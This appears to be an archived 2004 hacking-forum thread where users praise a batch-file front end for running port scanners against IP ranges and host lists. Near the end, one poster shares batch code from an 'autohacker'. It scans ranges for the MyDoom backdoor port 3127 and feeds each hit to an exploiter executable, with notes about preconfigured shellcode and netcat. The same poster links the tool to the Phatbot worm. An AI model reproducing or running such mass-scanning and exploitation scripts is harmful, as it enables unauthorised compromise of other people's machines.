hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

Zero-X
Well I was a litlle bored to always go in dos and start the scanners,etc... So I decided to make all in one Batch File wink.gif

Plz give me your FeedBack and Comments...

For more Batch:
CODE
www.fxpworld.vze.com


Btw tnx to H4x0r3 for the Batch form biggrin.gif

ScreenShot at the bottom wink.gif

Enj0y!

-ZX
Zero-X
here's teh file now tongue.gif
DarkAngel52457
Thx for this nice tool
sylver
cool thanks for this tool, i will have a look at it
clubfed
got a copy of tups? your link on your site is dead
Zero-X
there biggrin.gif
Hellraiseruk
Nice Work Guyz..always handy biggrin.gif
maxxis
very good tool smile.gif
thx
stonebreaker
wonderful work
thx for share it
admire
liquidSilver
Great tool! smile.gif

I love those all-in-one tools, so you don't have to find each program everytime smile.gif
pdf
QUOTE (Zero-X @ Mar 13 2004, 08:26 PM)
All Around Auto Scanner

it's not an autoscanner m8 dry.gif

autoscanner means that you enter list of ranges and it scans it with all the requested ports
Zero-X
QUOTE (pdf @ Mar 14 2004, 10:14 AM)
QUOTE (Zero-X @ Mar 13 2004, 08:26 PM)
All Around Auto Scanner

it's not an autoscanner m8 dry.gif

autoscanner means that you enter list of ranges and it scans it with all the requested ports

then if that is what you call an auto scanner then.. gimme some hours/dayz and you will have tongue.gif

-Zx
Thebox
Good job man
Zero-X
QUOTE (pdf @ Mar 14 2004, 10:14 AM)
QUOTE (Zero-X @ Mar 13 2004, 08:26 PM)
All Around Auto Scanner

it's not an autoscanner m8 dry.gif

autoscanner means that you enter list of ranges and it scans it with all the requested ports

to let you and everybody else knows.. Zero-X AllAround Auto Scanner 1.01 is already underway biggrin.gif

I ahve figured out some craps..
New Features:

*- Let you scan from a host list
*- Let scan up to 5 ports
*- Let you scan up to 5 ranges
*- More Ports
s


maymore.. biggrin.gif

-Zx
clubfed
Zero-X: thanks for tups dude biggrin.gif I couldn't find it anywhere including the authors site.
bambipower
looks very nice, but i wait for these one : Zero-X AllAround Auto Scanner 1.01
Zero-X
Here's a Preview of Version 1.01 biggrin.gif
Buluemoon
Very nice work Zreo-X, very tight package.
Iltis
hi zero
you wrote you have written an all in one batch file
can you tell me what was the basic scanner? it seems to me like it was some sfind version, but which one exactly and how did you manage sfind to work with hostlists because natively sfind isn't able to do this and did you modify the sfind source code to do this?
would be nice if you could explain this smile.gif

greetz Iltis


sry don't have time to download the batch and take a look at it on my own :/
Zero-X
QUOTE (Iltis @ Mar 19 2004, 06:35 PM)
hi zero
you wrote you have written an all in one batch file
can you tell me what was the basic scanner? it seems to me like it was some sfind version, but which one exactly and how did you manage sfind to work with hostlists because natively sfind isn't able to do this and did you modify the sfind source code to do this?
would be nice if you could explain this smile.gif

greetz Iltis


sry don't have time to download the batch and take a look at it on my own :/

the basic of version 1.00 was SCan1000 and the basic of v1.01 was Scan500
I haven't touched the .exe in anyway it's only the batch file that does it all biggrin.gif
has for the hostfile it's the command

QUOTE
@echo off
@echo name of the txt file with scanned ip's (ip.txt)
set /p list=
@echo off
If "%list%" =="" GoTo EXIT
for /f "eol=; tokens=1*" %%i in (%list%) do scan500.exe -p %port% %%i
pause
cls


-Zx
StreetZone_
nice Zero-X ............keep it coming biggrin.gif
morning_wood
kinda looks like a rip

:1
cls
If "scan.txt" =="" GoTo end
@echo.
@echo running MyDoom.a exploiter
@echo assumes preconfigured shellcode and nc setup
@echo.
for /f "eol=; tokens=1*" %%1 in (scan.txt) do mykralor.exe %%1 3127 hs.exe
@echo.
@echo Done
@echo off
pause
goto :start

:scan_mydoom
cls
echo +-------------------------------------------+
echo ¦ Scan for ( mydoom port 3127 ) ¦
echo +-------------------------------------------+
echo.
@echo off
set /p startip=Start-ip :
set /p endip=End-ip :
@echo.
scan.exe -p 3127 %startip% %endip%
@echo.
@echo Done
pause
goto :start



im sorry my autohacker got posted at illmob for 2 days by accident. it also seems to have been the enlightenment to the author of the "phatbot" worm, much to my dismay.
sad.gif

ellitio
i already made an all port scanner
but let's have a look at this one smile.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.